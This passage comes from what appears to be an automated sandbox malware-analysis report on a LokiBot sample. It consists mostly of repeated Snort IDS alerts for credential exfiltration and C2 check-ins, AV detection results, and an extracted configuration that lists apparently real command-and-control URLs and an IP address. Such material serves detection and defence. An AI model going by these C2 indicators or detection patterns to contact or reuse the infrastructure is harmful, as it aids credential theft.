                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:45.817567
                SID:2021641
                Source Port:49748
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:14.912121
                SID:2025381
                Source Port:49768
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:49.380266
                SID:2021641
                Source Port:49791
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:26.814059
                SID:2021641
                Source Port:49776
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:31.393355
                SID:2021641
                Source Port:49779
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:47.288202
                SID:2025381
                Source Port:49749
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:01.257517
                SID:2024313
                Source Port:49712
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:16:56.772780
                SID:2024318
                Source Port:49709
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:44.899678
                SID:2024313
                Source Port:49788
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:04.154071
                SID:2021641
                Source Port:49760
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:16:56.772780
                SID:2024313
                Source Port:49709
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:34.395592
                SID:2024313
                Source Port:49781
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:17.652364
                SID:2021641
                Source Port:49729
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:25.351055
                SID:2024318
                Source Port:49775
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:05.666467
                SID:2025381
                Source Port:49761
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:16:52.374211
                SID:2024312
                Source Port:49706
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:25.655732
                SID:2024318
                Source Port:49734
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:16:52.374211
                SID:2024317
                Source Port:49706
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:34.754471
                SID:2024313
                Source Port:49740
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:34.754471
                SID:2024318
                Source Port:49740
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:56.686682
                SID:2025381
                Source Port:49755
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:27.158635
                SID:2021641
                Source Port:49735
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:34.395592
                SID:2024318
                Source Port:49781
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:16.164912
                SID:2024318
                Source Port:49728
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:04.956657
                SID:2025381
                Source Port:49714
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:16.378463
                SID:2024313
                Source Port:49769
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:36.230211
                SID:2021641
                Source Port:49741
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:59.618244
                SID:2021641
                Source Port:49757
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:25.655732
                SID:2024313
                Source Port:49734
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:16.378463
                SID:2024318
                Source Port:49769
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:25.351055
                SID:2024313
                Source Port:49775
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:16.164912
                SID:2024313
                Source Port:49728
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://kbfvzoboss.bid/alien/fre.phpURL Reputation: Label: malware
                Source: http://kbfvzoboss.bid/alien/fre.phpURL Reputation: Label: malware
                Source: http://alphastand.win/alien/fre.phpURL Reputation: Label: malware
                Source: http://alphastand.trade/alien/fre.phpURL Reputation: Label: malware
                Source: http://alphastand.top/alien/fre.phpURL Reputation: Label: malware
                Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://136.244.109.75/index.php/1748937"]}
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeReversingLabs: Detection: 18%
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeVirustotal: Detection: 33%Perma Link
                Source: gunzipped.exeReversingLabs: Detection: 18%
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeJoe Sandbox ML: detected
                Source: gunzipped.exeJoe Sandbox ML: detected
                Source: gunzipped.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: gunzipped.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\gunzipped.exeCode function: 4x nop then jmp 052FAB1Ah0_2_052FAC9B
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeCode function: 4x nop then jmp 06329CEAh9_2_06329E6B

                Networking

                barindex
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49705 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49705 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49705 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49705 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49706 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49706 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49706 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49706 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49707 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49707 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49707 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49707 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49708 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49708 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49708 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49708 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49709 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49709 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49709 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49709 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49710 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49710 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49710 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49710 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49711 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49711 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49711 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49711 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49712 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49712 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49712 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49712 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49713 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49713 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49713 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49713 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49714 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49714 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49714 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49714 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49716 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49716 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49716 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49716 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49723 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49723 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49723 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49723 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49724 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49724 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49724 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49724 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49725 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49725 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49725 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49725 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49726 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49726 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49726 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49726 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49727 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49727 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49727 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49727 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49728 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49728 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49728 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49728 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49729 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49729 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49729 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49729 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49730 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49730 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49730 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49730 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49731 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49731 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49731 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49731 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49732 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49732 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49732 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49732 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49733 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49733 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49733 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49733 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49734 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49734 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49734 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49734 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49735 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49735 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49735 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49735 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49736 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49736 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49736 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49736 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49737 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49737 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49737 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49737 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49738 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49738 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49738 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49738 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49739 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49739 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49739 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49739 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49740 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49740 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49740 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49740 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49741 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49741 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49741 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49741 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49742 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49742 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49742 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49742 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49743 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49743 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49743 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49743 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49744 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49744 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49744 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49744 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49745 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49745 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49745 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49745 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49746 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49746 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49746 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49746 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49748 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49748 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49748 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49748 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49749 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49749 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49749 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49749 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49750 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49750 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49750 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49750 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49751 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49751 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49751 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49751 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49752 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49752 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49752 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49752 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49753 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49753 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49753 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49753 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49754 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49754 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49754 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49754 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49755 -> 136.244.109.75:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49755 -> 136.244.109.75:80
